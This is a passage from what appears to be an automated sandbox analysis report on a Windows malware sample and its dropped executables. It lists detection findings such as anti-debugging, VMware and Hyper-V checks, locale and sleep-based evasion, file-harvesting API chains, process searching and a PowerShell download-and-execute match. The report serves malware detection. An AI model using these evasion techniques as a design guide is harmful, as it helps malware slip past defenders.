                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F00F59 pushfd ; iretd 2_2_02F01078
                  Source: mCe4hBfqCT.exeStatic PE information: section name: .text entropy: 7.6672496441732925
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.495915274293571
                  Source: 64A.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.495915274293571
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile created: C:\Users\user\AppData\Local\Temp\64A.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found evasive API chain (may stop execution after checking locale)
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_2-26434
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeWindow / User API: threadDelayed 353Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeWindow / User API: threadDelayed 9640Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeEvaded block: after key decisiongraph_2-27595
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65177
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI coverage: 6.4 %
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196Thread sleep count: 353 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196Thread sleep time: -250983s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196Thread sleep count: 9640 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exe TID: 6196Thread sleep time: -6854040s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03048C79 FindFirstFileExW,0_2_03048C79
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_02F0E697
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_02F147D7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_02F0EF87
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F14B77
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_02F13B17
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0F8F1 FindFirstFileA,2_2_02F0F8F1
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_02F0DCE7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_02F0C0D7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F0E077
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F01937
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F0F917
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_02F14107
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00401160 GetSystemInfo,ExitProcess,2_2_00401160
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareF
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26419
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26422
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26441
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-27832
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26462
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26307
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26433
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26261
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,2_2_004045C0
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,000000002_2_004045C0
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]0_2_0042FE7F
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_02D29B4B push dword ptr fs:[00000030h]0_2_02D29B4B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030400E6 mov eax, dword ptr fs:[00000030h]0_2_030400E6
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0301092B mov eax, dword ptr fs:[00000030h]0_2_0301092B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03010D90 mov eax, dword ptr fs:[00000030h]0_2_03010D90
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00419750 mov eax, dword ptr fs:[00000030h]2_2_00419750
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02D19653 push dword ptr fs:[00000030h]2_2_02D19653
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F199B7 mov eax, dword ptr fs:[00000030h]2_2_02F199B7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F00D90 mov eax, dword ptr fs:[00000030h]2_2_02F00D90
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0092B mov eax, dword ptr fs:[00000030h]2_2_02F0092B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0302075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0302075A
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0303A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0303A65A
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0301FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0301FB9D
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_030208ED SetUnhandledExceptionFilter,0_2_030208ED
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041AD48
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0041CEEA SetUnhandledExceptionFilter,2_2_0041CEEA
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041B33A
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F1AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_02F1AFAF
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F1B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_02F1B5A1
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F1D151 SetUnhandledExceptionFilter,2_2_02F1D151
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00419600
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F19867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_02F19867
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeProcess created: C:\Users\user\AppData\Local\Temp\64A.tmp.exe "C:\Users\user\AppData\Local\Temp\64A.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0041079B cpuid 0_2_0041079B
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_004351E0
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0043B2ED
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0043B2A2
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0043B388
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_0043B665
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_0043B895
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_00434DED
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0304B291
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_03045054
